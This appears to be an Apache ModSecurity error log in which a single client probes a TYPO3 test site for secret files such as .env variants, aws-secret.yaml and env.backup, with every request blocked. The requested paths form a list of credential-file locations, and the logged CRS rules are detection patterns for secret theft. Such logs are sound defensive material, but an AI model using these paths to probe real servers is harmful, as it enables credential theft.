[Wed Feb 18 18:15:36.839085 2026] [:error] [pid 2167597] [client 195.178.110.34:41122] [client 195.178.110.34] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env"] [unique_id "aZXzuLL5cjoaqbNB75y5QQAAAA4"]
[Wed Feb 18 18:15:36.839267 2026] [:error] [pid 2167597] [client 195.178.110.34:41122] [client 195.178.110.34] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env"] [unique_id "aZXzuLL5cjoaqbNB75y5QQAAAA4"]
[Wed Feb 18 18:15:41.951323 2026] [:error] [pid 2161191] [client 195.178.110.34:36428] [client 195.178.110.34] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /dev/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/dev/.env"] [unique_id "aZXzvXPppL83WAI9ZsBOeQAAAAE"]
[Wed Feb 18 18:15:41.951605 2026] [:error] [pid 2161191] [client 195.178.110.34:36428] [client 195.178.110.34] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/dev/.env"] [unique_id "aZXzvXPppL83WAI9ZsBOeQAAAAE"]
[Wed Feb 18 18:15:41.952212 2026] [:error] [pid 2161191] [client 195.178.110.34:36428] [client 195.178.110.34] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/dev/.env"] [unique_id "aZXzvXPppL83WAI9ZsBOeQAAAAE"]
[Wed Feb 18 18:15:41.982599 2026] [:error] [pid 2161191] [client 195.178.110.34:36428] [client 195.178.110.34] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /new/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/new/.env"] [unique_id "aZXzvXPppL83WAI9ZsBOegAAAAE"]
[Wed Feb 18 18:15:41.982824 2026] [:error] [pid 2161191] [client 195.178.110.34:36428] [client 195.178.110.34] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/new/.env"] [unique_id "aZXzvXPppL83WAI9ZsBOegAAAAE"]
[Wed Feb 18 18:15:41.983055 2026] [:error] [pid 2161191] [client 195.178.110.34:36428] [client 195.178.110.34] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/new/.env"] [unique_id "aZXzvXPppL83WAI9ZsBOegAAAAE"]
[Wed Feb 18 18:15:42.017615 2026] [:error] [pid 2161191] [client 195.178.110.34:36428] [client 195.178.110.34] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /new/.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/new/.env.local"] [unique_id "aZXzvnPppL83WAI9ZsBOewAAAAE"]
[Wed Feb 18 18:15:42.017835 2026] [:error] [pid 2161191] [client 195.178.110.34:36428] [client 195.178.110.34] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/new/.env.local"] [unique_id "aZXzvnPppL83WAI9ZsBOewAAAAE"]
[Wed Feb 18 18:15:42.018013 2026] [:error] [pid 2161191] [client 195.178.110.34:36428] [client 195.178.110.34] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/new/.env.local"] [unique_id "aZXzvnPppL83WAI9ZsBOewAAAAE"]
[Wed Feb 18 18:15:45.375844 2026] [:error] [pid 2167592] [client 195.178.110.34:36440] [client 195.178.110.34] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /new/.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/new/.env.production"] [unique_id "aZXzwbwAbj7ynvBbVCIkiQAAAAs"]
[Wed Feb 18 18:15:45.376067 2026] [:error] [pid 2167592] [client 195.178.110.34:36440] [client 195.178.110.34] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/new/.env.production"] [unique_id "aZXzwbwAbj7ynvBbVCIkiQAAAAs"]
[Wed Feb 18 18:15:45.376249 2026] [:error] [pid 2167592] [client 195.178.110.34:36440] [client 195.178.110.34] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/new/.env.production"] [unique_id "aZXzwbwAbj7ynvBbVCIkiQAAAAs"]
[Wed Feb 18 18:15:45.429364 2026] [:error] [pid 2167592] [client 195.178.110.34:36440] [client 195.178.110.34] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /new/.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/new/.env.staging"] [unique_id "aZXzwbwAbj7ynvBbVCIkigAAAAs"]
[Wed Feb 18 18:15:45.429581 2026] [:error] [pid 2167592] [client 195.178.110.34:36440] [client 195.178.110.34] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/new/.env.staging"] [unique_id "aZXzwbwAbj7ynvBbVCIkigAAAAs"]
[Wed Feb 18 18:15:45.429747 2026] [:error] [pid 2167592] [client 195.178.110.34:36440] [client 195.178.110.34] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/new/.env.staging"] [unique_id "aZXzwbwAbj7ynvBbVCIkigAAAAs"]
[Wed Feb 18 18:15:53.744820 2026] [authz_core:error] [pid 2174667] [client 195.178.110.34:45394] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/aws-secret.yaml
[Wed Feb 18 18:15:59.967750 2026] [authz_core:error] [pid 2161192] [client 195.178.110.34:34758] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/aws-secret.yaml
[Wed Feb 18 18:15:59.992339 2026] [:error] [pid 2161192] [client 195.178.110.34:34758] [client 195.178.110.34] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /awstats/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/awstats/.env"] [unique_id "aZXzz1AwHIXdOR_IjqGnjwAAAAI"]
[Wed Feb 18 18:15:59.992573 2026] [:error] [pid 2161192] [client 195.178.110.34:34758] [client 195.178.110.34] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/awstats/.env"] [unique_id "aZXzz1AwHIXdOR_IjqGnjwAAAAI"]
[Wed Feb 18 18:15:59.992779 2026] [:error] [pid 2161192] [client 195.178.110.34:34758] [client 195.178.110.34] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/awstats/.env"] [unique_id "aZXzz1AwHIXdOR_IjqGnjwAAAAI"]
[Wed Feb 18 18:16:00.025003 2026] [:error] [pid 2161192] [client 195.178.110.34:34758] [client 195.178.110.34] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /conf/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/conf/.env"] [unique_id "aZXz0FAwHIXdOR_IjqGnkAAAAAI"]
[Wed Feb 18 18:16:00.025371 2026] [:error] [pid 2161192] [client 195.178.110.34:34758] [client 195.178.110.34] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/conf/.env"] [unique_id "aZXz0FAwHIXdOR_IjqGnkAAAAAI"]
[Wed Feb 18 18:16:00.025645 2026] [:error] [pid 2161192] [client 195.178.110.34:34758] [client 195.178.110.34] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/conf/.env"] [unique_id "aZXz0FAwHIXdOR_IjqGnkAAAAAI"]
[Wed Feb 18 18:16:00.048850 2026] [:error] [pid 2161192] [client 195.178.110.34:34758] [client 195.178.110.34] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cron/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/cron/.env"] [unique_id "aZXz0FAwHIXdOR_IjqGnkQAAAAI"]
[Wed Feb 18 18:16:00.049210 2026] [:error] [pid 2161192] [client 195.178.110.34:34758] [client 195.178.110.34] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/cron/.env"] [unique_id "aZXz0FAwHIXdOR_IjqGnkQAAAAI"]
[Wed Feb 18 18:16:00.049474 2026] [:error] [pid 2161192] [client 195.178.110.34:34758] [client 195.178.110.34] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/cron/.env"] [unique_id "aZXz0FAwHIXdOR_IjqGnkQAAAAI"]
[Wed Feb 18 18:16:00.149866 2026] [:error] [pid 2167596] [client 195.178.110.34:34760] [client 195.178.110.34] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /www/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/www/.env"] [unique_id "aZXz0ANfOk4fQtXkBoshaAAAAAk"]
[Wed Feb 18 18:16:00.150113 2026] [:error] [pid 2167596] [client 195.178.110.34:34760] [client 195.178.110.34] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/www/.env"] [unique_id "aZXz0ANfOk4fQtXkBoshaAAAAAk"]
[Wed Feb 18 18:16:00.150308 2026] [:error] [pid 2167596] [client 195.178.110.34:34760] [client 195.178.110.34] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/www/.env"] [unique_id "aZXz0ANfOk4fQtXkBoshaAAAAAk"]
[Wed Feb 18 18:16:00.183300 2026] [:error] [pid 2167596] [client 195.178.110.34:34760] [client 195.178.110.34] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /docker/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/docker/.env"] [unique_id "aZXz0ANfOk4fQtXkBoshaQAAAAk"]
[Wed Feb 18 18:16:00.183522 2026] [:error] [pid 2167596] [client 195.178.110.34:34760] [client 195.178.110.34] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/docker/.env"] [unique_id "aZXz0ANfOk4fQtXkBoshaQAAAAk"]
[Wed Feb 18 18:16:00.183696 2026] [:error] [pid 2167596] [client 195.178.110.34:34760] [client 195.178.110.34] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/docker/.env"] [unique_id "aZXz0ANfOk4fQtXkBoshaQAAAAk"]
[Wed Feb 18 18:16:00.212265 2026] [:error] [pid 2167596] [client 195.178.110.34:34760] [client 195.178.110.34] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /docker/app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/docker/app/.env"] [unique_id "aZXz0ANfOk4fQtXkBoshagAAAAk"]
[Wed Feb 18 18:16:00.212492 2026] [:error] [pid 2167596] [client 195.178.110.34:34760] [client 195.178.110.34] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/docker/app/.env"] [unique_id "aZXz0ANfOk4fQtXkBoshagAAAAk"]
[Wed Feb 18 18:16:00.212669 2026] [:error] [pid 2167596] [client 195.178.110.34:34760] [client 195.178.110.34] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/docker/app/.env"] [unique_id "aZXz0ANfOk4fQtXkBoshagAAAAk"]
[Wed Feb 18 18:16:03.097788 2026] [:error] [pid 2161842] [client 195.178.110.34:34768] [client 195.178.110.34] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/env.backup"] [unique_id "aZXz0x7i3MGSJhlZ2JDhCQAAAAY"]
[Wed Feb 18 18:16:03.098088 2026] [:error] [pid 2161842] [client 195.178.110.34:34768] [client 195.178.110.34] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/env.backup"] [unique_id "aZXz0x7i3MGSJhlZ2JDhCQAAAAY"]
[Wed Feb 18 18:16:03.098284 2026] [:error] [pid 2161842] [client 195.178.110.34:34768] [client 195.178.110.34] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/env.backup"] [unique_id "aZXz0x7i3MGSJhlZ2JDhCQAAAAY"]
[Wed Feb 18 18:16:12.317493 2026] [:error] [pid 2162821] [client 195.178.110.34:46252] [client 195.178.110.34] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/env.backup"] [unique_id "aZXz3CIBqKqS85r3VthteQAAAAo"]
